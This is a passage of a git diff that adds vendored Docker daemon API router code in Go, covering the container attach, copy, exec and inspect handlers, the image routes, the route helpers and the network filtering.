+		return conn, conn, conn, nil
+	}
+
+	attachConfig := &backend.ContainerAttachConfig{
+		GetStreams: setupStreams,
+		Logs:       httputils.BoolValue(r, "logs"),
+		Stream:     httputils.BoolValue(r, "stream"),
+		DetachKeys: detachKeys,
+		UseStdin:   true,
+		UseStdout:  true,
+		UseStderr:  true,
+		MuxStreams: false, // TODO: this should be true since it's a single stream for both stdout and stderr
+	}
+
+	err = s.backend.ContainerAttach(containerName, attachConfig)
+	close(done)
+	select {
+	case <-started:
+		logrus.Errorf("Error attaching websocket: %s", err)
+		return nil
+	default:
+	}
+	return err
+}
+
+func (s *containerRouter) postContainersPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	pruneFilters, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	pruneReport, err := s.backend.ContainersPrune(pruneFilters)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, pruneReport)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/copy.go b/vendor/github.com/docker/docker/api/server/router/container/copy.go
new file mode 100644
index 0000000000..ede6dff92c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/copy.go
@@ -0,0 +1,119 @@
+package container
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"golang.org/x/net/context"
+)
+
+// postContainersCopy is deprecated in favor of getContainersArchive.
+func (s *containerRouter) postContainersCopy(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	// Deprecated since 1.8, Errors out since 1.12
+	version := httputils.VersionFromContext(ctx)
+	if versions.GreaterThanOrEqualTo(version, "1.24") {
+		w.WriteHeader(http.StatusNotFound)
+		return nil
+	}
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	cfg := types.CopyConfig{}
+	if err := json.NewDecoder(r.Body).Decode(&cfg); err != nil {
+		return err
+	}
+
+	if cfg.Resource == "" {
+		return fmt.Errorf("Path cannot be empty")
+	}
+
+	data, err := s.backend.ContainerCopy(vars["name"], cfg.Resource)
+	if err != nil {
+		if strings.Contains(strings.ToLower(err.Error()), "no such container") {
+			w.WriteHeader(http.StatusNotFound)
+			return nil
+		}
+		if os.IsNotExist(err) {
+			return fmt.Errorf("Could not find the file %s in container %s", cfg.Resource, vars["name"])
+		}
+		return err
+	}
+	defer data.Close()
+
+	w.Header().Set("Content-Type", "application/x-tar")
+	if _, err := io.Copy(w, data); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// // Encode the stat to JSON, base64 encode, and place in a header.
+func setContainerPathStatHeader(stat *types.ContainerPathStat, header http.Header) error {
+	statJSON, err := json.Marshal(stat)
+	if err != nil {
+		return err
+	}
+
+	header.Set(
+		"X-Docker-Container-Path-Stat",
+		base64.StdEncoding.EncodeToString(statJSON),
+	)
+
+	return nil
+}
+
+func (s *containerRouter) headContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	v, err := httputils.ArchiveFormValues(r, vars)
+	if err != nil {
+		return err
+	}
+
+	stat, err := s.backend.ContainerStatPath(v.Name, v.Path)
+	if err != nil {
+		return err
+	}
+
+	return setContainerPathStatHeader(stat, w.Header())
+}
+
+func (s *containerRouter) getContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	v, err := httputils.ArchiveFormValues(r, vars)
+	if err != nil {
+		return err
+	}
+
+	tarArchive, stat, err := s.backend.ContainerArchivePath(v.Name, v.Path)
+	if err != nil {
+		return err
+	}
+	defer tarArchive.Close()
+
+	if err := setContainerPathStatHeader(stat, w.Header()); err != nil {
+		return err
+	}
+
+	w.Header().Set("Content-Type", "application/x-tar")
+	_, err = io.Copy(w, tarArchive)
+
+	return err
+}
+
+func (s *containerRouter) putContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	v, err := httputils.ArchiveFormValues(r, vars)
+	if err != nil {
+		return err
+	}
+
+	noOverwriteDirNonDir := httputils.BoolValue(r, "noOverwriteDirNonDir")
+	return s.backend.ContainerExtractToDir(v.Name, v.Path, noOverwriteDirNonDir, r.Body)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/exec.go b/vendor/github.com/docker/docker/api/server/router/container/exec.go
new file mode 100644
index 0000000000..1134a0e797
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/exec.go
@@ -0,0 +1,140 @@
+package container
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/stdcopy"
+	"golang.org/x/net/context"
+)
+
+func (s *containerRouter) getExecByID(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	eConfig, err := s.backend.ContainerExecInspect(vars["id"])
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, eConfig)
+}
+
+func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+	name := vars["name"]
+
+	execConfig := &types.ExecConfig{}
+	if err := json.NewDecoder(r.Body).Decode(execConfig); err != nil {
+		return err
+	}
+
+	if len(execConfig.Cmd) == 0 {
+		return fmt.Errorf("No exec command specified")
+	}
+
+	// Register an instance of Exec in container.
+	id, err := s.backend.ContainerExecCreate(name, execConfig)
+	if err != nil {
+		logrus.Errorf("Error setting up exec command in container %s: %v", name, err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{
+		ID: id,
+	})
+}
+
+// TODO(vishh): Refactor the code to avoid having to specify stream config as part of both create and start.
+func (s *containerRouter) postContainerExecStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	version := httputils.VersionFromContext(ctx)
+	if versions.GreaterThan(version, "1.21") {
+		if err := httputils.CheckForJSON(r); err != nil {
+			return err
+		}
+	}
+
+	var (
+		execName                  = vars["name"]
+		stdin, inStream           io.ReadCloser
+		stdout, stderr, outStream io.Writer
+	)
+
+	execStartCheck := &types.ExecStartCheck{}
+	if err := json.NewDecoder(r.Body).Decode(execStartCheck); err != nil {
+		return err
+	}
+
+	if exists, err := s.backend.ExecExists(execName); !exists {
+		return err
+	}
+
+	if !execStartCheck.Detach {
+		var err error
+		// Setting up the streaming http interface.
+		inStream, outStream, err = httputils.HijackConnection(w)
+		if err != nil {
+			return err
+		}
+		defer httputils.CloseStreams(inStream, outStream)
+
+		if _, ok := r.Header["Upgrade"]; ok {
+			fmt.Fprint(outStream, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n")
+		} else {
+			fmt.Fprint(outStream, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n")
+		}
+
+		// copy headers that were removed as part of hijack
+		if err := w.Header().WriteSubset(outStream, nil); err != nil {
+			return err
+		}
+		fmt.Fprint(outStream, "\r\n")
+
+		stdin = inStream
+		stdout = outStream
+		if !execStartCheck.Tty {
+			stderr = stdcopy.NewStdWriter(outStream, stdcopy.Stderr)
+			stdout = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
+		}
+	}
+
+	// Now run the user process in container.
+	// Maybe we should we pass ctx here if we're not detaching?
+	if err := s.backend.ContainerExecStart(context.Background(), execName, stdin, stdout, stderr); err != nil {
+		if execStartCheck.Detach {
+			return err
+		}
+		stdout.Write([]byte(err.Error() + "\r\n"))
+		logrus.Errorf("Error running exec in container: %v", err)
+	}
+	return nil
+}
+
+func (s *containerRouter) postContainerExecResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	height, err := strconv.Atoi(r.Form.Get("h"))
+	if err != nil {
+		return err
+	}
+	width, err := strconv.Atoi(r.Form.Get("w"))
+	if err != nil {
+		return err
+	}
+
+	return s.backend.ContainerExecResize(vars["name"], height, width)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/inspect.go b/vendor/github.com/docker/docker/api/server/router/container/inspect.go
new file mode 100644
index 0000000000..dbbced7eee
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/inspect.go
@@ -0,0 +1,21 @@
+package container
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/api/server/httputils"
+	"golang.org/x/net/context"
+)
+
+// getContainersByName inspects container's configuration and serializes it as json.
+func (s *containerRouter) getContainersByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	displaySize := httputils.BoolValue(r, "size")
+
+	version := httputils.VersionFromContext(ctx)
+	json, err := s.backend.ContainerInspect(vars["name"], displaySize, version)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, json)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/experimental.go b/vendor/github.com/docker/docker/api/server/router/experimental.go
new file mode 100644
index 0000000000..51385c2552
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/experimental.go
@@ -0,0 +1,67 @@
+package router
+
+import (
+	"errors"
+	"net/http"
+
+	"golang.org/x/net/context"
+
+	apierrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/server/httputils"
+)
+
+var (
+	errExperimentalFeature = errors.New("This experimental feature is disabled by default. Start the Docker daemon with --experimental in order to enable it.")
+)
+
+// ExperimentalRoute defines an experimental API route that can be enabled or disabled.
+type ExperimentalRoute interface {
+	Route
+
+	Enable()
+	Disable()
+}
+
+// experimentalRoute defines an experimental API route that can be enabled or disabled.
+// It implements ExperimentalRoute
+type experimentalRoute struct {
+	local   Route
+	handler httputils.APIFunc
+}
+
+// Enable enables this experimental route
+func (r *experimentalRoute) Enable() {
+	r.handler = r.local.Handler()
+}
+
+// Disable disables the experimental route
+func (r *experimentalRoute) Disable() {
+	r.handler = experimentalHandler
+}
+
+func experimentalHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return apierrors.NewErrorWithStatusCode(errExperimentalFeature, http.StatusNotImplemented)
+}
+
+// Handler returns returns the APIFunc to let the server wrap it in middlewares.
+func (r *experimentalRoute) Handler() httputils.APIFunc {
+	return r.handler
+}
+
+// Method returns the http method that the route responds to.
+func (r *experimentalRoute) Method() string {
+	return r.local.Method()
+}
+
+// Path returns the subpath where the route responds to.
+func (r *experimentalRoute) Path() string {
+	return r.local.Path()
+}
+
+// Experimental will mark a route as experimental.
+func Experimental(r Route) Route {
+	return &experimentalRoute{
+		local:   r,
+		handler: experimentalHandler,
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/image/backend.go b/vendor/github.com/docker/docker/api/server/router/image/backend.go
new file mode 100644
index 0000000000..19a67a5ed0
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/image/backend.go
@@ -0,0 +1,45 @@
+package image
+
+import (
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/registry"
+	"golang.org/x/net/context"
+)
+
+// Backend is all the methods that need to be implemented
+// to provide image specific functionality.
+type Backend interface {
+	containerBackend
+	imageBackend
+	importExportBackend
+	registryBackend
+}
+
+type containerBackend interface {
+	Commit(name string, config *backend.ContainerCommitConfig) (imageID string, err error)
+}
+
+type imageBackend interface {
+	ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error)
+	ImageHistory(imageName string) ([]*types.ImageHistory, error)
+	Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error)
+	LookupImage(name string) (*types.ImageInspect, error)
+	TagImage(imageName, repository, tag string) error
+	ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error)
+}
+
+type importExportBackend interface {
+	LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error
+	ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error
+	ExportImage(names []string, outStream io.Writer) error
+}
+
+type registryBackend interface {
+	PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, metaHeaders map[string][]string) (*registry.SearchResults, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/image/image.go b/vendor/github.com/docker/docker/api/server/router/image/image.go
new file mode 100644
index 0000000000..54a4d51482
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/image/image.go
@@ -0,0 +1,50 @@
+package image
+
+import (
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/router"
+)
+
+// imageRouter is a router to talk with the image controller
+type imageRouter struct {
+	backend Backend
+	decoder httputils.ContainerDecoder
+	routes  []router.Route
+}
+
+// NewRouter initializes a new image router
+func NewRouter(backend Backend, decoder httputils.ContainerDecoder) router.Router {
+	r := &imageRouter{
+		backend: backend,
+		decoder: decoder,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routes to the image controller
+func (r *imageRouter) Routes() []router.Route {
+	return r.routes
+}
+
+// initRoutes initializes the routes in the image router
+func (r *imageRouter) initRoutes() {
+	r.routes = []router.Route{
+		// GET
+		router.NewGetRoute("/images/json", r.getImagesJSON),
+		router.NewGetRoute("/images/search", r.getImagesSearch),
+		router.NewGetRoute("/images/get", r.getImagesGet),
+		router.NewGetRoute("/images/{name:.*}/get", r.getImagesGet),
+		router.NewGetRoute("/images/{name:.*}/history", r.getImagesHistory),
+		router.NewGetRoute("/images/{name:.*}/json", r.getImagesByName),
+		// POST
+		router.NewPostRoute("/commit", r.postCommit),
+		router.NewPostRoute("/images/load", r.postImagesLoad),
+		router.Cancellable(router.NewPostRoute("/images/create", r.postImagesCreate)),
+		router.Cancellable(router.NewPostRoute("/images/{name:.*}/push", r.postImagesPush)),
+		router.NewPostRoute("/images/{name:.*}/tag", r.postImagesTag),
+		router.NewPostRoute("/images/prune", r.postImagesPrune),
+		// DELETE
+		router.NewDeleteRoute("/images/{name:.*}", r.deleteImages),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/image/image_routes.go b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go
new file mode 100644
index 0000000000..69403652a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go
@@ -0,0 +1,344 @@
+package image
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+func (s *imageRouter) postCommit(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	cname := r.Form.Get("container")
+
+	pause := httputils.BoolValue(r, "pause")
+	version := httputils.VersionFromContext(ctx)
+	if r.FormValue("pause") == "" && versions.GreaterThanOrEqualTo(version, "1.13") {
+		pause = true
+	}
+
+	c, _, _, err := s.decoder.DecodeConfig(r.Body)
+	if err != nil && err != io.EOF { //Do not fail if body is empty.
+		return err
+	}
+	if c == nil {
+		c = &container.Config{}
+	}
+
+	commitCfg := &backend.ContainerCommitConfig{
+		ContainerCommitConfig: types.ContainerCommitConfig{
+			Pause:        pause,
+			Repo:         r.Form.Get("repo"),
+			Tag:          r.Form.Get("tag"),
+			Author:       r.Form.Get("author"),
+			Comment:      r.Form.Get("comment"),
+			Config:       c,
+			MergeConfigs: true,
+		},
+		Changes: r.Form["changes"],
+	}
+
+	imgID, err := s.backend.Commit(cname, commitCfg)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{
+		ID: string(imgID),
+	})
+}
+
+// Creates an image from Pull or from Import
+func (s *imageRouter) postImagesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	var (
+		image   = r.Form.Get("fromImage")
+		repo    = r.Form.Get("repo")
+		tag     = r.Form.Get("tag")
+		message = r.Form.Get("message")
+		err     error
+		output  = ioutils.NewWriteFlusher(w)
+	)
+	defer output.Close()
+
+	w.Header().Set("Content-Type", "application/json")
+
+	if image != "" { //pull
+		metaHeaders := map[string][]string{}
+		for k, v := range r.Header {
+			if strings.HasPrefix(k, "X-Meta-") {
+				metaHeaders[k] = v
+			}
+		}
+
+		authEncoded := r.Header.Get("X-Registry-Auth")
+		authConfig := &types.AuthConfig{}
+		if authEncoded != "" {
+			authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+			if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil {
+				// for a pull it is not an error if no auth was given
+				// to increase compatibility with the existing api it is defaulting to be empty
+				authConfig = &types.AuthConfig{}
+			}
+		}
+
+		err = s.backend.PullImage(ctx, image, tag, metaHeaders, authConfig, output)
+	} else { //import
+		src := r.Form.Get("fromSrc")
+		// 'err' MUST NOT be defined within this block, we need any error
+		// generated from the download to be available to the output
+		// stream processing below
+		err = s.backend.ImportImage(src, repo, tag, message, r.Body, output, r.Form["changes"])
+	}
+	if err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		sf := streamformatter.NewJSONStreamFormatter()
+		output.Write(sf.FormatError(err))
+	}
+
+	return nil
+}
+
+func (s *imageRouter) postImagesPush(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	metaHeaders := map[string][]string{}
+	for k, v := range r.Header {
+		if strings.HasPrefix(k, "X-Meta-") {
+			metaHeaders[k] = v
+		}
+	}
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	authConfig := &types.AuthConfig{}
+
+	authEncoded := r.Header.Get("X-Registry-Auth")
+	if authEncoded != "" {
+		// the new format is to handle the authConfig as a header
+		authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+		if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil {
+			// to increase compatibility to existing api it is defaulting to be empty
+			authConfig = &types.AuthConfig{}
+		}
+	} else {
+		// the old format is supported for compatibility if there was no authConfig header
+		if err := json.NewDecoder(r.Body).Decode(authConfig); err != nil {
+			return fmt.Errorf("Bad parameters and missing X-Registry-Auth: %v", err)
+		}
+	}
+
+	image := vars["name"]
+	tag := r.Form.Get("tag")
+
+	output := ioutils.NewWriteFlusher(w)
+	defer output.Close()
+
+	w.Header().Set("Content-Type", "application/json")
+
+	if err := s.backend.PushImage(ctx, image, tag, metaHeaders, authConfig, output); err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		sf := streamformatter.NewJSONStreamFormatter()
+		output.Write(sf.FormatError(err))
+	}
+	return nil
+}
+
+func (s *imageRouter) getImagesGet(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	w.Header().Set("Content-Type", "application/x-tar")
+
+	output := ioutils.NewWriteFlusher(w)
+	defer output.Close()
+	var names []string
+	if name, ok := vars["name"]; ok {
+		names = []string{name}
+	} else {
+		names = r.Form["names"]
+	}
+
+	if err := s.backend.ExportImage(names, output); err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		sf := streamformatter.NewJSONStreamFormatter()
+		output.Write(sf.FormatError(err))
+	}
+	return nil
+}
+
+func (s *imageRouter) postImagesLoad(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	quiet := httputils.BoolValueOrDefault(r, "quiet", true)
+
+	w.Header().Set("Content-Type", "application/json")
+
+	output := ioutils.NewWriteFlusher(w)
+	defer output.Close()
+	if err := s.backend.LoadImage(r.Body, output, quiet); err != nil {
+		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+	}
+	return nil
+}
+
+func (s *imageRouter) deleteImages(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+
+	if strings.TrimSpace(name) == "" {
+		return fmt.Errorf("image name cannot be blank")
+	}
+
+	force := httputils.BoolValue(r, "force")
+	prune := !httputils.BoolValue(r, "noprune")
+
+	list, err := s.backend.ImageDelete(name, force, prune)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, list)
+}
+
+func (s *imageRouter) getImagesByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	imageInspect, err := s.backend.LookupImage(vars["name"])
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, imageInspect)
+}
+
+func (s *imageRouter) getImagesJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	imageFilters, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	version := httputils.VersionFromContext(ctx)
+	filterParam := r.Form.Get("filter")
+	if versions.LessThan(version, "1.28") && filterParam != "" {
+		imageFilters.Add("reference", filterParam)
+	}
+
+	images, err := s.backend.Images(imageFilters, httputils.BoolValue(r, "all"), false)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, images)
+}
+
+func (s *imageRouter) getImagesHistory(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	name := vars["name"]
+	history, err := s.backend.ImageHistory(name)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, history)
+}
+
+func (s *imageRouter) postImagesTag(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	if err := s.backend.TagImage(vars["name"], r.Form.Get("repo"), r.Form.Get("tag")); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusCreated)
+	return nil
+}
+
+func (s *imageRouter) getImagesSearch(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	var (
+		config      *types.AuthConfig
+		authEncoded = r.Header.Get("X-Registry-Auth")
+		headers     = map[string][]string{}
+	)
+
+	if authEncoded != "" {
+		authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+		if err := json.NewDecoder(authJSON).Decode(&config); err != nil {
+			// for a search it is not an error if no auth was given
+			// to increase compatibility with the existing api it is defaulting to be empty
+			config = &types.AuthConfig{}
+		}
+	}
+	for k, v := range r.Header {
+		if strings.HasPrefix(k, "X-Meta-") {
+			headers[k] = v
+		}
+	}
+	limit := registry.DefaultSearchLimit
+	if r.Form.Get("limit") != "" {
+		limitValue, err := strconv.Atoi(r.Form.Get("limit"))
+		if err != nil {
+			return err
+		}
+		limit = limitValue
+	}
+	query, err := s.backend.SearchRegistryForImages(ctx, r.Form.Get("filters"), r.Form.Get("term"), limit, config, headers)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, query.Results)
+}
+
+func (s *imageRouter) postImagesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	pruneFilters, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	pruneReport, err := s.backend.ImagesPrune(pruneFilters)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, pruneReport)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/local.go b/vendor/github.com/docker/docker/api/server/router/local.go
new file mode 100644
index 0000000000..7cb2a5a2f3
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/local.go
@@ -0,0 +1,96 @@
+package router
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/api/server/httputils"
+	"golang.org/x/net/context"
+)
+
+// localRoute defines an individual API route to connect
+// with the docker daemon. It implements Route.
+type localRoute struct {
+	method  string
+	path    string
+	handler httputils.APIFunc
+}
+
+// Handler returns the APIFunc to let the server wrap it in middlewares.
+func (l localRoute) Handler() httputils.APIFunc {
+	return l.handler
+}
+
+// Method returns the http method that the route responds to.
+func (l localRoute) Method() string {
+	return l.method
+}
+
+// Path returns the subpath where the route responds to.
+func (l localRoute) Path() string {
+	return l.path
+}
+
+// NewRoute initializes a new local route for the router.
+func NewRoute(method, path string, handler httputils.APIFunc) Route {
+	return localRoute{method, path, handler}
+}
+
+// NewGetRoute initializes a new route with the http method GET.
+func NewGetRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("GET", path, handler)
+}
+
+// NewPostRoute initializes a new route with the http method POST.
+func NewPostRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("POST", path, handler)
+}
+
+// NewPutRoute initializes a new route with the http method PUT.
+func NewPutRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("PUT", path, handler)
+}
+
+// NewDeleteRoute initializes a new route with the http method DELETE.
+func NewDeleteRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("DELETE", path, handler)
+}
+
+// NewOptionsRoute initializes a new route with the http method OPTIONS.
+func NewOptionsRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("OPTIONS", path, handler)
+}
+
+// NewHeadRoute initializes a new route with the http method HEAD.
+func NewHeadRoute(path string, handler httputils.APIFunc) Route {
+	return NewRoute("HEAD", path, handler)
+}
+
+func cancellableHandler(h httputils.APIFunc) httputils.APIFunc {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		if notifier, ok := w.(http.CloseNotifier); ok {
+			notify := notifier.CloseNotify()
+			notifyCtx, cancel := context.WithCancel(ctx)
+			finished := make(chan struct{})
+			defer close(finished)
+			ctx = notifyCtx
+			go func() {
+				select {
+				case <-notify:
+					cancel()
+				case <-finished:
+				}
+			}()
+		}
+		return h(ctx, w, r, vars)
+	}
+}
+
+// Cancellable makes new route which embeds http.CloseNotifier feature to
+// context.Context of handler.
+func Cancellable(r Route) Route {
+	return localRoute{
+		method:  r.Method(),
+		path:    r.Path(),
+		handler: cancellableHandler(r.Handler()),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/backend.go b/vendor/github.com/docker/docker/api/server/router/network/backend.go
new file mode 100644
index 0000000000..0d1dfb0123
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/network/backend.go
@@ -0,0 +1,22 @@
+package network
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/libnetwork"
+)
+
+// Backend is all the methods that need to be implemented
+// to provide network specific functionality.
+type Backend interface {
+	FindNetwork(idName string) (libnetwork.Network, error)
+	GetNetworkByName(idName string) (libnetwork.Network, error)
+	GetNetworksByID(partialID string) []libnetwork.Network
+	GetNetworks() []libnetwork.Network
+	CreateNetwork(nc types.NetworkCreateRequest) (*types.NetworkCreateResponse, error)
+	ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error
+	DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error
+	DeleteNetwork(name string) error
+	NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/filter.go b/vendor/github.com/docker/docker/api/server/router/network/filter.go
new file mode 100644
index 0000000000..94affb83cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/network/filter.go
@@ -0,0 +1,96 @@
+package network
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/runconfig"
+)
+
+var (
+	// AcceptedFilters is an acceptable filters for validation
+	AcceptedFilters = map[string]bool{
+		"driver": true,
+		"type":   true,
+		"name":   true,
+		"id":     true,
+		"label":  true,
+	}
+)
+
+func filterNetworkByType(nws []types.NetworkResource, netType string) (retNws []types.NetworkResource, err error) {
+	switch netType {
+	case "builtin":
+		for _, nw := range nws {
+			if runconfig.IsPreDefinedNetwork(nw.Name) {
+				retNws = append(retNws, nw)
+			}
+		}
+	case "custom":
+		for _, nw := range nws {
+			if !runconfig.IsPreDefinedNetwork(nw.Name) {
+				retNws = append(retNws, nw)
+			}
+		}
+	default:
+		return nil, fmt.Errorf("Invalid filter: 'type'='%s'", netType)
+	}
+	return retNws, nil
+}
+
+// filterNetworks filters network list according to user specified filter
